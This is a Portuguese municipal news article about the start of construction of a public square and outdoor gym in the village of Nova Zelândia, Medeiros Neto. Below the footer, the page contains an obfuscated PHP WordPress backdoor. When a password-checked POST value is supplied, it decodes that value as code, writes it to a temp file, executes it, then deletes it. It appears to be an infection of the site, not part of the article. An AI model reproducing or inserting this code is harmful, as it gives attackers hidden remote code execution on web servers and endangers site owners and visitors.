• SEJA BEM-VINDO

Prefeitura Municipal inicia construção de praça no povoado de Nova Zelândia

Publicado em: 17/09/2022 Atualizado:: setembro 17, 2022

 

Um espaço de lazer para crianças e adultos. Este é o projeto da praça Alaide Freire Costa, que começou a ser construída pela Prefeitura de Medeiros Neto, por meio da Secretaria de Obras e Infraestrutura, no povoado de Nova Zelândia.

 

De acordo com o secretário de Obras e Serviços Públicos, Hugo Barros, a equipe de profissionais já executou os serviços de limpeza e regularização do terreno.

 

“Concluída essa etapa, vamos iniciar a implantação dos meio-fios para delimitar o espaço da praça, que vai homenagear a senhora Alaide Freire Costa”, explica Hugo.

 

 

A pedido do prefeito Beto Pinto, a equipe está iniciando a implantação de uma academia ao ar livre, com aparelhos que trabalham todos os grupos musculares, oferecendo atividades físicas de baixo impacto, destinadas aos adolescentes, adultos e idosos que queiram e precisam fortalecer a musculatura, melhorar a flexibilidade, reduzir o sedentarismo.

 

O novo espaço promete ser um local aconchegante, que irá promover a socialização e o bem estar para as famílias daquela localidade. De acordo com o prefeito Beto Pinto, a obra vai criar um ambiente interativo.

 

“Sempre foi um desejo nosso e, principalmente, da comunidade contar com uma praça de lazer para atender aos jovens e as famílias. Iniciamos mais essa praça que logo será entregue para à comunidade. O nosso objetivo com a construção de mais uma praça com moderna estrutura é trazer mais qualidade de vida e lazer para todos os moradores. Vamos seguir em frente, fazendo as transformações que o nosso município tanto necessita”, disse o prefeito.

 

 

É resgatando mais um compromisso que a gestão Nossa Gente em Primeiro Lugar avança com a construção de mais um espaço de lazer, agora no povoado de Nova Zelândia.

 

Prefeitura Municipal de Medeiros Neto
Nossa gente em primeiro lugar

 

………………………………

 

Fonte: ASCOM/PMN

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}